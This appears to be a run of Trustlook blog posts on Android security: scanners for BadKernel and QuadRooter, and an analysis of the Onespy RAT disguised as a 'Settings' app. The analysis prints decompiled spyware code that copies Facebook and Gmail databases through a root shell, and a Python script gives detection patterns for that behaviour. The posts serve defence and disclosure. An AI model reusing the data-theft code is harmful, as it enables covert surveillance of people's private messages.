Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app
  2. Trustlook Mobile Security protection is triggered and the app is uploaded to Trustlook’s cloud. In some rare instances Trustlook’s system has no prior knowledge of the app, so it is provisionally treated as benign.
  3. A few days later, Trustlook’s Core Security system detects this new app as malware.
  4. Trustlook Operations launches “Instant Protection” to notify Jack of this malware and to prompt him to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality. Full, 100% coverage is not possible. To mitigate this risk, Trustlook now offers Instant Protection.

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with an embedded WebView (such as the massively popular WeChat app), may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

[Screenshots: the BadKernel Vulnerability detector in the Trustlook Mobile Security app]

The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not running the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests that users not click on random links or links that appear suspicious. Trustlook also stresses that users should keep their apps and OS updated and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.

Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app is detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of 8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

[Screenshot: the package icon]

Upon execution, the app persuades the user to grant device administrator access in order to maintain persistence on the system:

[Screenshot: the device administrator activation prompt]


The app runs itself as a service in the background:

[Screenshot: the app listed as a running service]


In the screenshot below, the second “Settings” entry is actually the Remote Administration Tool (RAT) app, cleverly disguised:

[Screenshot: the installed apps list showing two “Settings” entries]


The app is developed by “www.onespy.in” and signed with the following certificate:

[Screenshot: the signing certificate]


Apparently the app is signed with the Android debug certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the package one chooses, the registered user can perform different functions and retrieve data from many popular apps, such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following decompiled code snippets are used to retrieve Facebook chat data:

public class FBDBSender
{
  // Copies a file through a root shell ("su -c cp <src> <dst>"); true when cp exits with 0
  private static boolean copyDB(String paramString1, String paramString2)
  {
    try
    {
      L.l("fb copy:" + paramString1 + ";" + paramString2);
      paramString1 = "cp " + paramString1 + " " + paramString2;
      int i = Runtime.getRuntime().exec(new String[] { "su", "-c", paramString1 }).waitFor();
      return i == 0;
    }
    catch (Exception paramString1)
    {
      L.l(paramString1);
    }
    return false;
  }

  // Extracts the "name" field from a JSON string, or "" if parsing fails
  private static String getName(String paramString)
  {
    try
    {
      paramString = new JSONObject(paramString).getString("name");
      return paramString;
    }
    catch (Exception paramString) {}
    return "";
  }

  [...]

  // Copies Facebook's private threads database to external storage and reads the messages table
  private static void sendThreadsTable(Context paramContext)
  {
    if (Environment.getExternalStorageState().equals("mounted")) {
      localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
    }
    for (;;)
    {
      str = localObject + "/fbdb2.db";
      if (Environment.getExternalStorageState().equals("mounted"))
      {
        localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
        localObject = localObject + "/fb_chat.csv";
      }
      for (;;)
      {
        try
        {
          if (copyDB("/data/data/com.facebook.katana/databases/threads_db2", str))
          {
            L.l("fbdb copied");
            localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);
            localCursor = localSQLiteDatabase.rawQuery("SELECT sender, text, timestamp_ms FROM messages", null);
  [...]


The following decompiled code snippets are used to get Gmail data:

public class GMailAppDBReader
{
  private static final String dbnamePrefix = "gmldbcp_";

  // Locates Gmail mailstore databases through a root shell and copies each one out
  private static String[] copyDB(Context paramContext)
  {
    Object localObject3;
    int i;
    int j;
    OutputStream localOutputStream;
    try
    {
      localObject1 = Runtime.getRuntime().exec(new String[] { "su", "-c", "find / -name mailstore*@gmail.com.db" }).getInputStream();
      Object localObject2 = new byte[660];
      localObject3 = new StringBuffer();
      for (;;)
      {
        i = ((InputStream)localObject1).read((byte[])localObject2);
        if (i == -1)
        {
          // One mailstore path per line of the find output
          localObject2 = ((StringBuffer)localObject3).toString().split("\n");
          localObject3 = new String[localObject2.length];
          j = 0;
          Process localProcess = Runtime.getRuntime().exec("su");
          localOutputStream = localProcess.getOutputStream();
          int k = localObject2.length;
          i = 0;
          if (i < k) {
            break;
          }
          [...]
    // The account name is the part of the path between the last '/' and the '@'
    String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf('/') + 1, ((String)localObject1).lastIndexOf('@'));
    StringBuilder localStringBuilder = new StringBuilder("cp ").append((String)localObject1).append(" ");
    if (Environment.getExternalStorageState().equals("mounted")) {}
    for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())
    {
      // The copy command is written, newline-terminated, into the root shell's stdin
      localOutputStream.write(((String)localObject1 + "/" + "gmldbcp_" + str + ".db\n").getBytes());
      localObject3[j] = str;
      j += 1;
      i += 1;
      break;
    }
  }
  [...]


One special feature the app provides is the ability to run a remote command shell, which gives the controller access to the Linux system underlying the Android device:

public class ExecShell {
  // Decompiled enum of shell commands; the only one defined checks whether a "su" binary is present
  public enum SHELL_CMD {
    public static final enum SHELL_CMD check_su_binary;

    static {
      SHELL_CMD.check_su_binary = new SHELL_CMD("check_su_binary", 0, new String[]{"/system/xbin/which", "su"});
      SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};
    }

    private SHELL_CMD(String arg1, int arg2, String[] command) {
      super(arg1, arg2);
      this.command = command;
    }

    public static SHELL_CMD valueOf(String arg1) {
      return Enum.valueOf(SHELL_CMD.class, arg1);
    }

    public static SHELL_CMD[] values() {
      SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;
      int v1 = v0.length;
      SHELL_CMD[] v2 = new SHELL_CMD[v1];
      System.arraycopy(v0, 0, v2, 0, v1);
      return v2;
    }
  }
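As an added example (not Trustlook’s code and not the malware’s), the following Python script triages decompiled Java text for the behaviours described above: running commands through a root shell with “su -c”, probing for the su binary, reading another package’s private database, searching for Gmail mailstore files, and requesting device administrator rights. The sample lines, rule names and weights are constructed for illustration.

```python
import re

# Constructed sample lines modelled on the decompiled snippets above (not real malware source)
SAMPLE_DECOMPILED = '''\
int i = Runtime.getRuntime().exec(new String[] { "su", "-c", paramString1 }).waitFor();
if (copyDB("/data/data/com.facebook.katana/databases/threads_db2", str))
SQLiteDatabase.openDatabase("/data/data/com.path.call/databases/cfg.db", null, 1);
localObject1 = Runtime.getRuntime().exec(new String[] { "su", "-c", "find / -name mailstore*@gmail.com.db" }).getInputStream();
SHELL_CMD.check_su_binary = new SHELL_CMD("check_su_binary", 0, new String[]{"/system/xbin/which", "su"});
startActivity(new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN));
'''

# (rule name, compiled regex, weight): behaviours the write-up attributes to Android.Trojan.Pathcall
RULES = [
    ("root_shell_exec", re.compile(r'exec\(\s*new String\[\]\s*\{\s*"su",\s*"-c"'), 3),
    ("su_binary_probe", re.compile(r'"/system/xbin/which",\s*"su"|exec\("su"\)'), 2),
    ("gmail_mailstore_search", re.compile(r'find / -name mailstore\*@gmail\.com\.db'), 3),
    ("device_admin_request", re.compile(r'ACTION_ADD_DEVICE_ADMIN'), 1),
]
# A private database path of some package; triage() flags it only when the package is not our own
DB_PATH = re.compile(r'/data/data/([\w.]+)/databases/')

WEIGHTS = {name: weight for name, _pattern, weight in RULES}
WEIGHTS["foreign_app_db"] = 3


def triage(source, own_package):
    """Map each rule that fires to the 1-based line numbers where it fired."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern, _weight in RULES:
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
        m = DB_PATH.search(line)
        if m and m.group(1) != own_package:
            hits.setdefault("foreign_app_db", []).append(lineno)
    return hits


def risk_score(hits):
    """Sum the weights of fired rules, capped at 10 to mirror the page's 0-10 severity scale."""
    return min(10, sum(WEIGHTS[name] for name in hits))


if __name__ == "__main__":
    found = triage(SAMPLE_DECOMPILED, "com.path.call")
    for name, lines in sorted(found.items()):
        print(f"{name}: lines {lines}")
    print("risk score:", risk_score(found))
```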


Summary

The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, and also misused as a powerful remote control tool by criminals and malicious hackers.

Trustlook Updates Qualcomm QuadRooter Scanner Android App

Trustlook has updated its popular Qualcomm QuadRooter Scanner app to improve the app’s stability. QuadRooter is a set of four vulnerabilities (CVE-2016-2059, CVE-2016-2503, CVE-2016-2504 and CVE-2016-5340) affecting an estimated 900 million Android smartphones and tablets built using Qualcomm chipsets; the app also covers the related Qualcomm Tether Controller vulnerability (CVE-2016-2060). The key updates to the app are as follows:

  1. Improved descriptions for QuadRooter-related vulnerabilities
  2. Added more information on “What is QuadRooter?” and “How can I stay safe?”
  3. Added details on each CVE (Common Vulnerabilities and Exposures) entry related to QuadRooter
  4. Updated design
  5. Improved stability

Please visit the Google Play store to update to the latest version of the QuadRooter detection app.


Top 5 Ways to Protect Yourself Against Qualcomm’s QuadRooter Vulnerability

QuadRooter is a set of four vulnerabilities (CVE-2016-2059, CVE-2016-2503, CVE-2016-2504 and CVE-2016-5340) affecting Android devices built using Qualcomm chipsets; the closely related Qualcomm Tether Controller vulnerability (CVE-2016-2060) is usually discussed alongside them. It is estimated that a staggering 900 million Android smartphones and tablets could be affected. Here are 5 ways to protect yourself against this vulnerability.

1. The most important thing you can do is avoid the problem in the first place. Only download apps from known sources. In your Android device’s security settings, make sure you have unchecked “Unknown sources.” This way you will be alerted if you attempt to install an app from a potentially unsafe source.


2. Scan your Android mobile phone with the free Qualcomm QuadRooter Scanner app available from the Google Play store. The app is small (less than 2 MB) and takes only a few seconds to run. In addition to the four QuadRooter vulnerabilities, this app also detects the Qualcomm Tether Controller Vulnerability (CVE-2016-2060).


3. Visit your phone manufacturer’s website for any available security patches, especially if you have one of the following highly-vulnerable devices:

  • Google Nexus 5X, Nexus 6 and Nexus 6P
  • HTC One, HTC M9 and HTC 10
  • BlackBerry Priv
  • LG G4, LG G5, and LG V10
  • New Moto X by Motorola
  • OnePlus One, OnePlus 2 and OnePlus 3
  • Samsung Galaxy S7 and Samsung S7 Edge
  • Sony Xperia Z Ultra
  • Blackphone 1 and Blackphone 2

4. Make sure your Android device is running the most up-to-date operating system. That would be either 5.1.1 (Lollipop) or 6.0.1 (Marshmallow) depending on your device.


5. Always have a mobile antivirus app installed on your Android device. Trustlook Antivirus and Mobile Security can be downloaded for free from the Google Play store.


Trustlook App Detects Qualcomm QuadRooter Vulnerability

Trustlook released a free Qualcomm QuadRooter Scanner application (available on Google Play) that enables Android phone owners to check if they are exposed to QuadRooter, the widespread vulnerability affecting millions of Android devices. If their device is exposed, the user may be able to download a software update from the device manufacturer that contains a security patch.

First detailed by security researchers at Check Point at DEFCON 24 in August 2016, QuadRooter is a set of four vulnerabilities affecting Android devices built using Qualcomm chipsets. In total, Check Point estimates that 900 million Android smartphones and tablets could be affected.

If any one of the four vulnerabilities is exploited, third-party apps could gain special system privileges, or access to a user’s SMS database or phone history, without the user’s knowledge. Such access could also provide an attacker with capabilities such as keylogging, GPS tracking, and recording video and audio.

Trustlook is working on providing detection against any additional Qualcomm vulnerabilities that may occur. Any user with a Qualcomm powered mobile device or tablet is encouraged to continually monitor their device.

Download the free QuadRooter Scanner app here.